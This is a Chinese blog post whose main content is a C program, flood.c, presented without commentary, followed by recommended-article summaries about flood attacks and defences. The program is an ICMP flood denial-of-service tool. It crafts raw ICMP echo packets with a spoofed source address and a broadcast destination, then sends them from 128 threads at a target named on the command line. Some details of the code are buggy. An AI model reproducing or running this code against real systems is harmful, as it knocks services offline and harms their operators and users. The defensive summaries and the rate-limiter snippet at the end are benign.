洪水攻击

最新推荐文章于 2025-05-12 12:10:58 发布
最新推荐文章于 2025-05-12 12:10:58 发布
阅读量651 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 网络 文章标签: Linux C 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/u011640816/article/details/39678047

flood.c

#include <stdio.h>
#include <ctype.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip_icmp.h>
#include <netinet/in.h>
#include <netdb.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <pthread.h>

#define MAXCHILD 128
static struct sockaddr_in dest;
unsigned long inaddr = 1;
static int PROTO_ICMP = -1;
static int RAW = -1;
static alive = -1;
static int rawsock = 0;


/*-----------------------------------------------------------------
; 函数:myrandom()
------------------------------------------------------------------*/
static inline int myrandom(int begin, int end)
{
	int gap = end - begin + 1;
	int ret = 0;
	srand((unsigned)time(0));
	ret = random()%gap + begin;
	
	return ret;
}

/*-----------------------------------------------------------------
; 函数:Dos_icmp()
------------------------------------------------------------------*/
static void Dos_icmp(void)
{

	struct ip *iph;
	struct icmphdr *icmph;
	char *packet;
	int pktsize = sizeof(struct ip) + sizeof(struct icmphdr) + 64;
	packet = malloc(pktsize);
	iph = (struct ip*)packet;
	icmph = (struct icmphdr*)(packet + sizeof(struct ip));
	memset(packet, 0, pktsize);
	
	iph->ip_v = 4;
	iph->ip_hl= 5;
	iph->ip_tos = 0;
	iph->ip_len = htons(pktsize);
	iph->ip_id  = htons(getpid());
	iph->ip_off = 0;
	iph->ip_ttl = 0x0;
	iph->ip_p = PROTO_ICMP;
	iph->ip_sum = 0;

	inet_aton("192.168.0.182", &iph->ip_src);
    inet_aton("192.168.0.255", &iph->ip_dst);
	
	icmph->type = ICMP_ECHO;
	icmph->code = 0;
	icmph->checksum  = htons(~(ICMP_ECHO << 8));	

	sendto(rawsock, packet, pktsize, 0, (struct sockaddr*)&dest, sizeof(dest));
	
	free(packet);
}


/*-----------------------------------------------------------------
; 函数:DoS_fun()
------------------------------------------------------------------*/
static void* DoS_fun(void *argv)
{
	while(alive)
	{
		Dos_icmp();
	}
}

/*-----------------------------------------------------------------
; 函数:Dos_sig()
------------------------------------------------------------------*/
static void Dos_sig()
{
	alive = 0;
	
	return ;
}

/*---------------------------------------------------------
; 函数: icmp_usage()
-----------------------------------------------------------*/
static void icmp_usage()
{
	printf("flood aaa.bbb.ccc.ddd\n");
}

/*-----------------------------------------------------------------
; 函数:main()
------------------------------------------------------------------*/
int main(int argc, char *argv[])
{
	struct hostent *host = NULL;
	struct protoent *protocol = NULL;
	char protoname[] = "icmp";
	int i = 0;
	pthread_t pthread[MAXCHILD];
	int err = -1;
	
	alive = 1;
	signal(SIGINT, Dos_sig);
	
	if(argc < 2)
	{
		icmp_usage();
		return -1;
	}
	
	protocol = getprotobyname(protoname);
	if(protocol == NULL)
	{
		perror("getprotobyname failed !");
		return -1;
	}
	
	inaddr = inet_addr(argv[1]);
	if(inaddr == INADDR_NONE)
	{
		host = gethostbyname(argv[1]);
		if(host == NULL)
		{
			perror("gethostbyname failed !");
			return -1;
		}
		
		memcpy((char*)&dest.sin_addr, host->h_addr, host->h_length);
	}
	else
	{
		memcpy((char*)&dest.sin_addr, &inaddr, sizeof(inaddr));
	}
	
	rawsock = socket(AF_INET, SOCK_RAW, RAW);
	if(rawsock < 0)
	{
		rawsock = socket(AF_INET, SOCK_RAW, protocol->p_proto);
	}
	
	setsockopt(rawsock, SOL_IP, IP_HDRINCL, "1", sizeof("1"));
	
	for(i=0; i<MAXCHILD; i++)
	{
		err = pthread_create(&pthread[i], NULL, DoS_fun, NULL);
	}
	
	for(i=0; i<MAXCHILD; i++)
	{
		pthread_join(pthread[i], NULL);
	}
	
	close(rawsock);
	return 0;}


洪水攻击以及防治方法
wufeifan_learner的博客
07-17 3504
洪水攻击又称洪泛攻击,是DoS攻击或者DDoS攻击常用的手段。但是针对不同的阶段的洪水攻击,我们处理方法也不同。当然,这里只谈防止的方法,不做具体细节的配置讲解。 针对TCP的洪水攻击 TCP三次握手规则 下面我把三次握手的详细情况介绍一下: 刚开始,主机1和主机2都是关闭状态。 主机1主动打开连接,主机2被动打开连接。 主机2创建一个TCB传输控制块,这个控制块存储关于连接的信息,比如TCP的连接表,发送与接收缓存的指针,重传队列的指针,发送号与接收号等等。TCB创建结束后,开启监听状态。 主机1创建
TCP洪水攻击
Riak, Spark, Golang, Erlang, 云存储, 云计算, 数据挖掘
10-13 3036
TCP洪水攻击   下面的程序是根据网友 ssffz1 改编的 ,修改后得效果不是很好,但作为学习还是可以说得过去,请支持原创 http://bbs.chinaunix.net/thread-2145439-1-1.html 改写的源代码  http://www.kuaipan.cn/file/id_51649056203605134.htm 原始的源代码  http
网络攻防技术解析:IP欺骗与洪水攻击
最新发布
weixin_28793831的博客
05-12 430
本文深入分析了网络攻击中的IP欺骗和洪水攻击技术,揭示了黑客如何利用系统漏洞进行攻击。通过探讨编程代码示例和防御措施,旨在提升读者对网络安全的认识。
SYN洪水攻击
Qqx1Ng的博客
06-18 1164
使用kali对靶机进行DDos攻击
ICMP flood(ICMP洪水攻击)
热门推荐
marywang56的专栏
07-24 3万+
最近在学习DDos相关知识,参考一些只是,做了摘要,供自己参考。 参考:http://blog.youkuaiyun.com/xlf13872135090/article/details/8059538什么是ICMP协议? ICMP是(Internet Control Message ProtocolInternet控制报文协议。它是TCP/IP协议族的一个子协议,用于在IP主机、路由器之间传递控制消息
洪水攻击列举
Wait for 的专栏
07-22 1006
1.排名最靠前,最简单的是SYN flood的攻击,俗称半连接攻击。 2.TCP FIN +ACK FLOOD 3.TCP RESET FLOOD 4.TCP SYN +ACK FLOOD 5.TCP Fragmentation flood 6.UDP FLOOD 7.ICMP FLOOD 8.IGMP FLOOD 9.HTTP FLOOD
Linux网络编程–洪水攻击详解
01-09
洪水攻击详解  ①注解:洪水攻击(FLOOD ATTACK)是指利用计算机网络技术向目标主机发送大量无用的数据报文,使得目标主机忙于处理无用的数据报文而无法提供正常服务的网络行为。  主要原理:利用了网络协议中...
UDP洪水攻击代码.rar
08-17
UDP洪水攻击(UDP Flood Attack)是一种网络攻击方式,利用了用户数据报协议(User Datagram Protocol, UDP)的特点来实现。这种攻击的主要目的是通过发送大量无用的UDP数据包到目标服务器,使服务器不堪重负,从而...
awl-0.2.tar.gz TCP SYN洪水攻击 linux工具
01-19
标题中的“awl-0.2.tar.gz”是一个Linux下的开源工具包,用于模拟TCP SYN洪水攻击。这种攻击网络层DDoS(分布式拒绝服务)攻击的一种常见形式,它利用TCP连接建立过程中的三次握手来消耗目标服务器的资源,从而使...
如何利用路由器做到防止DoS洪水攻击
03-03
"利用路由器防止DoS洪水攻击的知识点" 防止DoS洪水攻击网络安全专家的重要任务,而正确配置路由器能够有效防止DoS攻击。下面是相关的知识点: 1. DoS攻击的类型:DoS攻击主要分为Smurf、SYN Flood和Fraggle三种...
主动信息收集-DDOS攻击防御-SYN洪水攻击-资料包.rar
05-10
两个sh文件、一个GIF文件
mdk3源码工具,wifi洪水攻击
07-31
此为mdk3源码,复制到linux系统直接make即可,wifi攻击工具,实测好用
【2015/6/2】SYN洪水攻击
javacankillyou的专栏
06-02 1669
好了,今天又复习了一遍什么是SYN洪水攻击。       第一个是,什么是SYN攻击呢?其实就是利用TCP协议的规则来实行的。TCP是面向连接的协议,要 通过三次握手的过程,也就是A主机要向服务器发送一个SYN包请求连接,SYN是同步的意思。然后服务器发过来一个请求确认包,这时候已经建立了半连接,这是A主机受到确认之后,又要给服务器发送一个确认受到确认包的包。这个过程就叫三次握手协议。    
​​​​网络编程探索系列 —— 洪水网络攻击
weixin_73951752的博客
04-13 2884
洪水攻击,也被称为拒绝服务攻击(DoS),是一种旨在通过使网络或系统资源耗尽来阻止用户访问服务的攻击手段。这种攻击通常通过发送大量请求来淹没目标系统,导致合法用户无法访问服务,其中主要利用了网络协议的安全机制或者直接使用十分简单的大量ping资源的方法来对目标机造成影响。
洪水攻击怎么办?
weixin_34318326的博客
11-12 1821
洪水攻击网络攻击里比较常见的一种,一般体现就是机器慢(CPU居高不下),ssh等网络服务登陆缓慢甚至会出现登陆不上的情况,甚至在# netstat-n|awk'/^tcp/{++S[$NF]}END{for(ainS)printa,S[a]}'的命令里,发现SYN_RECV 的数量要远远大于ESTABLISHED的数量(几乎是...
【渗透测试笔记】之【拒绝服务攻击】_拒绝服务攻击的代码(1)
2401_84971562的博客
05-13 623
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
泛洪攻击实现
SuperChenPeng的博客
12-23 1629
网络泛洪(DDos):攻击侵入许多因特网上的系统,将DDos控制软件安装进去,然后这些系统再去感染其它系统,通过这些代理,攻击者将攻击指令发送给DDos控制软件,然后这个系统就去控制下面的代理系统去对某个IP地址发送大量假冒的网络流量,然后受攻击者的网络将被这些假的流量所占据就无法为他们的正常用户提供服务了。使用原始套接字时,应用程序负责构建完整的协议头,这使得它常常被用于构造和发送自定义的IP包,如在ping、traceroute等工具中,它们使用ICMP协议构建消息。最后,我们关闭了套接字。
多线程并发模拟实现与分析:基于Scapy的TCP SYN洪水攻击实验研究
正在成为 code ape
03-13 1429
SynFloodThread继承自Thread类,用于创建独立的线程执行SYN洪水攻击任务。在初始化时接收目标IP地址,并在其内部方法syn_flood中遍历源端口范围,构造合法的IP/TCP头信息组成SYN数据包。通过调用Scapy库的send(pkt)函数发送这些数据包。# 定义用于发送SYN洪水攻击的线程类super().__init__() # 初始化父类(Thread)self.target = target_ip # 目标IP地址# 全局变量引用源IP地址global src。
病毒分析之洪水攻击木马分析(hra33.dll(LPK.DLL))
Hades的博客
07-16 3198
病毒分析之洪水攻击木马分析(hra33.dll(LPK.DLL))样本信息文件名称:hra33.dll或lpk.dll文件: C:\Users\Hades-win7\Desktop\hra33.dll.vir大小: 46080 bytes修改时间: 2017年8月1日, 12:08:36MD5: A066B5BB41892068E172E5F52B3137F4SHA1: 658889F4B0F62...
HTTP洪水攻击
03-21
### HTTP 洪水攻击简介 HTTP 洪水攻击是一种分布式拒绝服务 (DDoS) 攻击形式,其主要目的是通过发送大量看似合法的 HTTP 请求来使服务器超载。这种类型的攻击通常利用僵尸网络中的多台设备向目标服务器发起请求,从而消耗服务器资源,导致正常用户的访问受阻。 此类攻击的特点在于它模仿正常的用户行为模式,使得检测和防御变得困难。由于每个请求都可能看起来像是来自真实用户的合法流量,传统的基于速率限制的方法往往无法有效阻止这些攻击[^1]。 ### 防御 HTTP 洪水攻击的技术手段 #### 使用 Web 应用防火墙 (WAF) Web 应用防火墙能够识别恶意流量并加以拦截。现代 WAF 可以分析传入的 HTTP/HTTPS 流量,并根据预定义的安全规则过滤掉潜在威胁性的请求。这有助于减轻由 HTTP 洪水攻击带来的负载压力[^2]。 #### 实施速率限制机制 尽管简单的速率限制对于高度复杂的 HTTP 洪水攻击效果有限,但它仍然是一个基础而重要的防线。通过对单个 IP 地址或其他标识符设置每秒允许的最大请求数目阈值,可以在一定程度上缓解小型规模的攻击影响[^3]。 #### 利用 CAPTCHA 技术验证人类用户身份 当检测到异常高的请求频率时,可以触发显示验证码页面让用户证明自己不是机器人程序的一部分。这种方法虽然增加了用户体验成本,但在抵御自动化工具驱动的大批量虚假请求方面非常有效[^4]。 #### 负载均衡器的作用 部署高效的负载均衡方案可以帮助分散进入系统的流量至不同的服务器实例上处理。即使某些节点受到严重影响,其他健康的节点仍可继续提供服务给真正的客户群体[^5]。 ```java // Java 示例:简单实现限流逻辑 public class RateLimiter { private Map<String, Long> requestTimestamps; public RateLimiter() { this.requestTimestamps = new HashMap<>(); } public boolean allowRequest(String clientIp, int maxRequestsPerSecond){ long currentTimeMillis = System.currentTimeMillis(); List<Long> timestampsForClient = requestTimestamps.getOrDefault(clientIp,new ArrayList<>()); while(!timestampsForClient.isEmpty()){ if(currentTimeMillis - timestampsForClient.get(0)>1000){ timestampsForClient.remove(0); }else{ break; } } if(timestampsForClient.size()<maxRequestsPerSecond){ timestampsForClient.add(currentTimeMillis); requestTimestamps.put(clientIp,timestampsForClient); return true; } return false; } } ``` 上述代码片段展示了一个简易版的令牌桶算法用于控制客户端发出请求的速度。如果某个特定时间段内的请求数超过了设定上限,则该次请求会被拒绝。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

爻渡

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值